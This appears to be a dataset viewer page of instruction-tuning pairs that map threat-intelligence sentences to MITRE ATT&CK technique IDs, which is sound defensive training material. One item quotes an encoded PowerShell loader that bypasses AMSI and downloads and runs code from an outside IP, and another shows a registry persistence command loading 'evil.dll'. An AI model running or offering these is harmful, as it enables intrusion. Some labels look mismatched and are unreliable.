text
stringlengths 104
2.24k
|
---|
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems.### Assistant: T1203: Exploitation for Client Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel malware can obtain system time from a compromised host.### Assistant: T1124: System Time Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PowerShell command decodes to the following:$command = 'WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACAAIAAgACAAdAByAHkAewAgAAoAIAAgACAAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQAKACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAzADkALgA1ADkALgA0ADYALgAxADUANAA6ADMANAA4ADUALwBJAE0AbwA4AG8AbwBzAGkAZQBWAGEAaQAnACkAOwAKACAAIAAgACAA' if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') { $exec = $Env:windir + '\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command IEX $exec } else { $exec = [System.Convert]::FromBase64String($command) $exec = [Text.Encoding]::Unicode.GetString($exec) IEX $exec }The script above checks the system architecture to determine if it is an x64 machine and attempts to execute a base64 encoded command that decodes to the following:[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{} IEX (New-Object Net.WebClient).DownloadString('http:// 139.59.46[.]154:3485 /IMo8oosieVai');This decoded PowerShell script attempts to download and execute a file using HTTP from the URL “hxxp:// 139.59.46[.]154:3485 /IMo8oosieVai”### Assistant: T1546: Event Triggered Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has executed a variety of PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used Remote Desktop Protocol for lateral movement.### Assistant: T1021: Remote Services |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.### Assistant: T1134: Access Token Manipulation |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda modifies several Registry keys under HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\ to disable phishing filters.### Assistant: T1112: Modify Registry |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.### Assistant: T1087: Account Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,As part of the anti-debugging or anti-monitoring techniques, ShellTea iterates over all the running processes, applies CRC32 on each process name (after converting the string to capital letters), and then compares the value against a predefined set of CRCs.### Assistant: T1057: Process Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has used a script to detect installed software on targeted systems.### Assistant: T1518: Software Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can collect the host's IP addresses using the ipconfig command.### Assistant: T1016: System Network Configuration Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis.### Assistant: T1207: Rogue Domain Controller |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group malware has collected Microsoft Office documents from mapped network drives.### Assistant: T1039: Data from Network Shared Drive |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown can use a VBS base64 decoder function published by Motobit.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.### Assistant: T1615: Group Policy Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Raindrop was installed under names that resembled legitimate Windows file and directory names.### Assistant: T1036: Masquerading |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.### Assistant: T1071: Application Layer Protocol |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Masquerading may increase the chance of users mistakenly executing these files.### Assistant: T1608: Stage Capabilities |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,COM + hijack in same sentence### Assistant: T1546: Event Triggered Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can uninstall malware components using a batch script.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them.### Assistant: T1036: Masquerading |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak checks the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings for proxy configurations information.### Assistant: T1012: Query Registry |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette has been signed with valid digital certificates.### Assistant: T1553: Subvert Trust Controls |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 includes garbage code to mislead anti-malware software and researchers.### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used tools like Adfind to query users, groups, organizational units, and trusts.### Assistant: T1069: Permission Groups Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Initial Compromise For initial compromise, FireEye Intelligence has observed APT39 leverage spear phishing emails with malicious attachments and/or hyperlinks typically resulting in a POWBAT infection### Assistant: T1566: Phishing |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications.### Assistant: T1548: Abuse Elevation Control Mechanism |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather credentials via APIs within a containers environment.### Assistant: T1552: Unsecured Credentials |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has specifically targeted government agency employees with spearphishing e-mails.### Assistant: T1589: Gather Victim Identity Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence through executing malicious commands triggered by a user’s shell.### Assistant: T1546: Event Triggered Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 obfuscates strings in the payload.### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used compromised domain accounts to gain access to the target environment.### Assistant: T1078: Valid Accounts |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ISMInjector hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.### Assistant: T1055: Process Injection |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has obtained the password for the victim's password manager via a custom keylogger.### Assistant: T1056: Input Capture |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Trojan uses the first four bytes of this hardware ID as a unique identifier for the system, which in our case was “0000”### Assistant: T1082: System Information Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.### Assistant: T1055: Process Injection |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook can collect information about the drives available on the system.### Assistant: T1082: System Information Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.### Assistant: T1553: Subvert Trust Controls |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session.### Assistant: T1546: Event Triggered Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT has a XOR-encoded payload.### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Otherwise, the Trojan will attempt to parse the response for a command, specifically by splitting the decode response on <> and treating the text to the left of the <> string as the command the text to the right as the command arguments### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis has a command to delete files from the victim’s machine.### Assistant: T1070: Indicator Removal on Host |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack’s dropper can list all running processes.### Assistant: T1057: Process Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp can start a remote VNC session by downloading a new plugin.### Assistant: T1021: Remote Services |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify XDG autostart entries to execute programs or commands during system boot.### Assistant: T1547: Boot or Logon Autostart Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also compile WMI scripts into Windows Management Object files that can be used to create a malicious subscription.### Assistant: T1546: Event Triggered Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred uses XOR and RC4 to perform decryption on the code functions.### Assistant: T1140: Deobfuscate/Decode Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.### Assistant: T1070: Indicator Removal on Host |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Service principal names are used to uniquely identify each instance of a Windows service.### Assistant: T1558: Steal or Forge Kerberos Tickets |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smart, optimized, and connected, XGen security powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense### Assistant: T1518: Software Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used AUDITPOL to prevent the collection of audit logs.### Assistant: T1562: Impair Defenses |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access is usually obtained through compromising accounts used to manage cloud infrastructure.### Assistant: T1535: Unused/Unsupported Cloud Regions |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has used malicious .exe or .dll files disguised as documents or images.### Assistant: T1204: User Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.### Assistant: T1021: Remote Services |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can use the Windows COM API to schedule tasks and maintain persistence.### Assistant: T1559: Inter-Process Communication |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target user email on local systems to collect sensitive information.### Assistant: T1114: Email Collection |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has exfiltrated data over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may also be found as parameters to deployment commands in container logs.### Assistant: T1552: Unsecured Credentials |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used the command cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.### Assistant: T1218: Signed Binary Proxy Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor launched a scheduled task to gain persistence using the schtasks /create /sc command.### Assistant: T1053: Scheduled Task/Job |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe can list running processes.### Assistant: T1057: Process Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has utilized tools to capture mouse movements.### Assistant: T1056: Input Capture |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,CoinTicker executes a bash script to establish a reverse shell.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can load a DLL using Rundll32.### Assistant: T1218: Signed Binary Proxy Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.### Assistant: T1020: Automated Exfiltration |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 will identify Microsoft Office documents on the victim's computer.### Assistant: T1005: Data from Local System |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR /NBT-NS traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system.### Assistant: T1557: Adversary-in-the-Middle |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper can execute shell commands against cmd.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper uses HTTP for C2.### Assistant: T1071: Application Layer Protocol |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,* In some cases a second visit to the website after the initial scan is required before exploit code is delivered.### Assistant: T1189: Drive-by Compromise |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regin has used a hidden file system to store some of its components.### Assistant: T1564: Hide Artifacts |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uses WMI to perform process monitoring.### Assistant: T1047: Windows Management Instrumentation |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used a netbios scanner for remote machine identification.### Assistant: T1018: Remote System Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has compromised social media accounts to conduct social engineering attacks.### Assistant: T1586: Compromise Accounts |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The GuLoader executable has been retrieved via embedded macros in malicious Word documents.### Assistant: T1204: User Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, live memory modification of the operating system can be combined with ROMMONkit to achieve persistence.### Assistant: T1601: Modify System Image |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control servers.### Assistant: T1071: Application Layer Protocol |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus can collect system drive information, the computer name, and the size of the disk.### Assistant: T1082: System Information Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.### Assistant: T1587: Develop Capabilities |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers.### Assistant: T1498: Network Denial of Service |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.### Assistant: T1497: Virtualization/Sandbox Evasion |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems.### Assistant: T1566: Phishing |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy uses the Camellia cipher to encrypt communications.### Assistant: T1573: Encrypted Channel |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 also used an HTTP malware variant to communicate over HTTP for C2.### Assistant: T1071: Application Layer Protocol |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE collects general system enumeration data about the infected machine and checks the OS version.### Assistant: T1082: System Information Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has the ability to remove files and folders related to previous infections.### Assistant: T1070: Indicator Removal on Host |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop has used the sleep command to avoid sandbox detection.### Assistant: T1497: Virtualization/Sandbox Evasion |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued### Assistant: T1113: Screen Capture |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda decrypts strings in the code during the execution process.### Assistant: T1140: Deobfuscate/Decode Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar obtains a list of running processes through WMI querying and the ps command.### Assistant: T1057: Process Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 wrote the encrypted and base64-encoded PowerShell backdoor code into that property### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil.dll"
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7.### Assistant: T1547: Boot or Logon Autostart Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The backdoor has the capability to download and upload files, execute shell commands, and update its configuration.### Assistant: T1105: Ingress Tool Transfer |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShell supports several profiles depending on the user or host program.### Assistant: T1546: Event Triggered Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can collect the username from the victim's machine.### Assistant: T1033: System Owner/User Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.### Assistant: T1203: Exploitation for Client Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex has used POST requests and HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy that can be set up by an adversary and used in phishing campaigns.### Assistant: T1539: Steal Web Session Cookie |
Subsets and Splits